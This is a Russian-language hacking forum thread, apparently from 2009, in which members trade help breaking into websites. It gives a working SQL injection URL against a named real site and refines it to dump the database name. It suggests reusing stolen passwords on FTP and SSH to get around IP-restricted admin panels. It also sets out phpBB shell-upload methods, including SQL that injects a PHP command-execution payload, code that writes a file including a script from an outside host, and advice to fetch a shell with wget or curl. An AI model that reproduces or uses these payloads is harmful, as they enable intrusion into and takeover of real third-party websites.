Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MurZeg

    MurZeg New Member

    Joined:
    29 Oct 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    А каким образом не подчкажеш?
     
  2. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Самым прямым способом - через шелл например которого как я понял у тебя нету или ftp доступ которого по всей видимости у тебя тоже нету так что на этот можешь даже и не расчитывать.
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    MurZeg
    Если доступ в админку закрыт по IP то никак ты туда не попадёшь, кроме как с разрешённых айпишников.

    -m0rgan-
    Как всегда в своём репертуаре.
    Мне интересно, ты сам как думаешь, если бы у него был доступ на запись .htaccess нахрена ему было-бы задавать тут эти вопросы и вообще ломиться в админку?
     
  4. MurZeg

    MurZeg New Member

    Joined:
    29 Oct 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Мда плохи дела... Всем спасибо за ответ
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    2jokester
    Иему нужен доступ в админку, на вход в акминку стоин ограничение по ипу по определённому диамозону, ИМХО.
    Он нашол баг и получил пароли, но в админку зайти не может.
    Ну почему бы ему не заюзать данный баг для получения доступа к .htaccess ?

    Меня не посвещали, для чего ему нужен доступ в админ панель.

    Возможно я ошибаюсь, но это моё личное мнение...
     
    #6825 -m0rgan-, 30 Apr 2009
    Last edited: 30 Apr 2009
  6. none222

    none222 Guest

    Reputations:
    0
    2MurZeg, попробуй поискать прокси, который подходит по данному диапазону (если ты его знаешь) - уже выручал такое =)
    А вообще, можешь тупо попробовать данный пасс к ФТП\ССХ и прочим...
    ====
    Ещё кстати вариант, тож встречался. Когда в Файле htaccess стоит ограницение по ИП только к Одному файлу, к примеру /admin/index.php, а ты попробуй прописать, к примеру /admin/admin.php и есть вероятность, что проканает

    (это в случае если ещё и админка так реализована)
     
    #6826 none222, 1 May 2009
    Last edited by a moderator: 1 May 2009
  7. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,2,3,4,5--

    При выявлении database() ниче не выскакивает (отчет о ошибках выключен я так пологаю) что делать?
     
  8. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    unhex(hex(concat_ws(0x3a,)))

    http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,database()))),3,4,5--+
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    concat_ws(0x3a

    в данном случае не нужен, используется только для вывода НЕСКОЛЬКИХ данных подряд, user:pass:mail например

    если только один параметр надо выцепить - то просто лишний оператор, иногда имеет значение при ограничении длины запроса
     
  10. none222

    none222 Guest

    Reputations:
    0
    Pashkela, я не думаю, что он этого незнал, так, для удобства написал, чтобы потом можнобыло не только датабэйс выводить
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    я тоже подозреваю, что знал, читай про "длину запроса". Не просто так написал
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    вообще использование concat_ws более надёжно, функция concat если ей будет передано значение равное NULL вернёт 0, а не то что хотелось бы)
    поэтому старайтесь юзать with separator, дабы избежать лишних проблем
     
  13. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Кто знает актуал методы залития шелла в phpbb?
    Импорт БД не канает, в гугле искал - ничего нормального
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Почему? У меня все работает. Используй метод с аватарой.
     
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    mailbrush вот! хочу спросить про метод с аватаркой
    Поподробней расскажи своими словами как его юзать
    Эксплоит от шанкара не канает почему то

    При импорте БД пишет

    SQL Error : 1045 Access denied for user '***'@'%' (using password: YES)
     
    #6835 diznt, 2 May 2009
    Last edited: 2 May 2009
  16. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ничего удивительного нет, прав у текущего юзера не хватает на выборку из БД...
    Метод древний как сам мир... на линк почитай, там всё описанно, можно кстати не только через аватарку, как вариант ещё и атачем...
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    DrAssault не знаю правильно я сделал, кароче сделал файл xz.jpg в нем php скрипт который записывает в опр. файл кое-что, при загрузке пишет

    пробывал по разному: xz.jpg%00.php xz.php%00.jpg
     
  18. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    вот тебе все способы ^__^. На все форумах, что я пробовал, работал 4-й способ.
     
  19. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    laedafess ок фенкс. 4 способ действительно проканал. (высвечиваеться phpinfo) но я чет не догоняю как залить с помощью этого шелл
    Вот код который импортирую

    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:
    $file= fopen(`shell.php`,`w`);
    fwrite($file, `<? @include("http://diznt.narod.ru/info2.txt"); ?>`);
    fclose($file);' WHERE user_id=2;

    Получаеться в подписи сам код!

    phpbb
    $file= fopen(`shell.php`,`w`);
    fwrite($file, `<? @include("http
    fclose($file);

    При этом сам файл shell.php не создаеться!
     
  20. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    импортируешь код:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;

    потом site.com/phpBB2/profile.php?mode=editprofile&cmd=ls -lia
    ну как то так)
    и льешь шелл. Через wget, curl или fetch..
     
Thread Status:
Not open for further replies.